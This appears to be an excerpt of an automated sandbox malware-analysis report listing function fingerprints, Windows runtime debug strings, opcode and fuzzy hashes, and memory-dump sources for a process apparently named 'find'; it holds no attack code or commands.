• API ID:
• String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
• API String ID: 0-2474120054
• Opcode ID: 80eaffb3734863246ad47290815aea3047869aafba2a3255230022e4d9624041
• Instruction ID: d0f9b90882d367999ec47440b837a576ad296aabde66e22530cffdbafbfc012d
• Opcode Fuzzy Hash: 80eaffb3734863246ad47290815aea3047869aafba2a3255230022e4d9624041
• Instruction Fuzzy Hash: C6E1C231A087419FD726DF28C884B2AB7E1BF45394F140B5DF6A5876E1DB74D848CB42

Strings
• RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02F87B7F
• RTL: Resource at %p, xrefs: 02F87B8E
• RTL: Re-Waiting, xrefs: 02F87BAC
Memory Dump Source
• Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
• Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
Similarity
• API ID:
• String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 0-871070163
• Opcode ID: 5ab5dc50ad5e6593878a0239f92981f8cbedf0696a2f1157f96abfa6d6d4797a
• Instruction ID: 54cdd2f88943f2e4cf21a7cce4f16d7046f542785d659f53344e749821d33299
• Opcode Fuzzy Hash: 5ab5dc50ad5e6593878a0239f92981f8cbedf0696a2f1157f96abfa6d6d4797a
• Instruction Fuzzy Hash: E941C235B047029BD720DE25CC40B6ABBE6EF84764F100A1DEA5ADB681DB71E8058F91

APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02F8728C
Strings
• RTL: Resource at %p, xrefs: 02F872A3
• RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02F87294
• RTL: Re-Waiting, xrefs: 02F872C1
Memory Dump Source
• Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
• Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 885266447-605551621
• Opcode ID: 41018b40a02fe489b098f9887c6b722994080ecf5e1c7a98a442f0f80b52f990
• Instruction ID: a6992aef7ed6df55e3a64a9950fea60fa255a32f556da44e1204da7a488e36de
• Opcode Fuzzy Hash: 41018b40a02fe489b098f9887c6b722994080ecf5e1c7a98a442f0f80b52f990
• Instruction Fuzzy Hash: D8412536B00202ABEB10EE24CC41B66F7A5FF44798F200618FB55E7680DB70E841CBD1

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
• Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$]:%u
• API String ID: 48624451-3050659472
• Opcode ID: 9f71f6d08b5dec51c8c0a9ad91ba4ec4ce156410b726e8c6fe947714826a9cba
• Instruction ID: 4fc9726bd0c0575e29c33dd2d7414129b18f898311b548a021988a71105add98
• Opcode Fuzzy Hash: 9f71f6d08b5dec51c8c0a9ad91ba4ec4ce156410b726e8c6fe947714826a9cba
• Instruction Fuzzy Hash: 14315472A002199FDB20DE29CD40BEE77F9EB44694F54459AED49E3240EB30DA549FA0

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
• Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-
• API String ID: 1302938615-2137968064
• Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
• Instruction ID: 9bf4906adc59d21698b72805b98c1f8c96e96108cbb3285bc83e5dd813f7dc5f
• Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
• Instruction Fuzzy Hash: 9391C571E002269BDF24EE69C8807BEF7E5AF447A4F14461AEF55E72C0D7308981CB90

Strings
Memory Dump Source
• Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
• Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
Similarity
• API ID:
• String ID: $$@
• API String ID: 0-1194432280
• Opcode ID: 39f706265e019ca9aba421d1a0ac6382b154df68fdc14337b77d4a4c9d159b67
• Instruction ID: 0627b99ecfa7539baf96110b5f14406ff60597f5bd04148281253706cbfd38cd
• Opcode Fuzzy Hash: 39f706265e019ca9aba421d1a0ac6382b154df68fdc14337b77d4a4c9d159b67
• Instruction Fuzzy Hash: 9C811B72D002699BDB25DF54CC54BEEB7B5AF08794F4041EAEA19B7280D7709E84CFA0

APIs
• @_EH4_CallFilterFunc@8.LIBCMT ref: 02F9CFBD
Strings
Memory Dump Source
• Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
• Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
Similarity
• API ID: CallFilterFunc@8
• String ID: @$@4Qw@4Qw
• API String ID: 4062629308-2383119779
• Opcode ID: fd4c7d1cb0e22dc3abb10f030b9345f30c32357689ae2dbc619a5e52b9ceb1d0
• Instruction ID: c9d729c9137a98e0e568b68fac5ccc79c62d9dae4e9b7323fee1d8457fd2230c
• Opcode Fuzzy Hash: fd4c7d1cb0e22dc3abb10f030b9345f30c32357689ae2dbc619a5e52b9ceb1d0
• Instruction Fuzzy Hash: C041AD75900228DFEB21EFA5C840A6EBBB9EF49B84F10406AEB15DB264D735D805CB61
